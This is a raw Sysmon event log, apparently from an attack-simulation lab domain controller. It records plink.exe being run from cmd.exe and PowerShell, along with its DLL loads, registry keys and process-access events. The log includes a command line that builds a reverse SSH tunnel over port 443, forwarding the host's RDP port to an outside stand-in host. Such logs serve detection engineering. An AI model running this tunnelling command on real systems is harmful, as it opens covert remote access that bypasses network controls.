534500x80000000000000007096186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:25.013{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe 11241100x80000000000000007096185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:25.008{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\AppData\Local\PUTTY.RND2022-09-15 16:39:08.083 734700x80000000000000007096184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x80000000000000007096183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 
12241200x80000000000000007096180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000007096179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.960{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x80000000000000007096178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007096176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000007096175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® 
Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000007096174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000007096173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000007096172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 11241100x80000000000000007096171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 
16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\AppData\Local\PUTTY.RND2022-09-15 16:39:08.083 734700x80000000000000007096170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000007096169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValid 734700x80000000000000007096168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000007096167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 
(rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValid 734700x80000000000000007096166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000007096165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000007096164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\combase.dll10.0.14393.5192 (rs1_release.220610-1622)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=336FBB55FF4D4E5A05343A51C98A8F74,SHA256=FD42EBCB39DD4311FA7515010FF4D08AC4DFF7D5C35FCB23207833ED4C2E8444trueMicrosoft WindowsValid 734700x80000000000000007096163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 
16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\windows.storage.dll10.0.14393.5291 (rs1_release.220806-1444)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=AA86B65DCB0ECF7263B863DE2A4E8D00,SHA256=2C4E0CA21438A610DCC55E24190146254E959DC5B8A0DE00BE517365CCCB10FBtrueMicrosoft WindowsValid 734700x80000000000000007096162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000007096161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.944{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\shell32.dll10.0.14393.5291 (rs1_release.220806-1444)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=D73641916AB4964C7FE9B4A37473A01B,SHA256=4BB60581FB93D73CDC4F1FBEA2DDACE5D16FE61B6E0E16622C326B6E2F407A7EtrueMicrosoft WindowsValid 734700x80000000000000007096160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft 
WindowsValid 734700x80000000000000007096159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000007096158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x80000000000000007096157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x80000000000000007096156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x80000000000000007096155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000007096154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000007096153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5291 (rs1_release.220806-1444)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=F8550606B41FF309D9A1DC76BB4EE875,SHA256=A1FFDD6A2EDA9E0CF047C74B00649A2EA228E3B8BDE1761C66879FA40335C2EBtrueMicrosoft WindowsValid 734700x80000000000000007096152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.928{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\sechost.dll10.0.14393.5006 
(rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValid 734700x80000000000000007096151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000007096150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValid 734700x80000000000000007096149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValid 734700x80000000000000007096148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 
16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000007096147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000007096146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000007096145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-5514-6323-F6FE-000000007402}6043876C:\Windows\system32\conhost.exe{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
734700x80000000000000007096144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\KernelBase.dll10.0.14393.5246 (rs1_release.220701-1744)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=96EFBE3DB6300BB13E0720809302FF9F,SHA256=2DE51A861E8D47D75730027E8BD70554363E10449EC258527C491EE8D4A57C2FtrueMicrosoft WindowsValid 734700x80000000000000007096143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValid 734700x80000000000000007096142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValid 734700x80000000000000007096141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon 
TathamPlinkMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAAtrueSimon TathamValid 10341000x80000000000000007096140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-6B85-631B-7001-000000007402}41004356C:\Windows\system32\csrss.exe{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007096139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.915{D271FDA4-553C-6323-01FF-000000007402}66607692C:\Windows\system32\cmd.exe{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007096138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.918{D271FDA4-553C-6323-02FF-000000007402}496C:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlink.\plink.exe -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 
example.comC:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA{D271FDA4-553C-6323-01FF-000000007402}6660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c .\plink.exe -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.com 154100x80000000000000007096103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:24.904{D271FDA4-553C-6323-01FF-000000007402}6660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c .\plink.exe -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.comC:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{D271FDA4-5514-6323-F5FE-000000007402}3996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 534500x80000000000000007095980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.152{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exe 11241100x80000000000000007095979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.149{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\AppData\Local\PUTTY.RND2022-09-15 16:39:08.083 734700x80000000000000007095978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 
16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 734700x80000000000000007095951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 734700x80000000000000007095924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 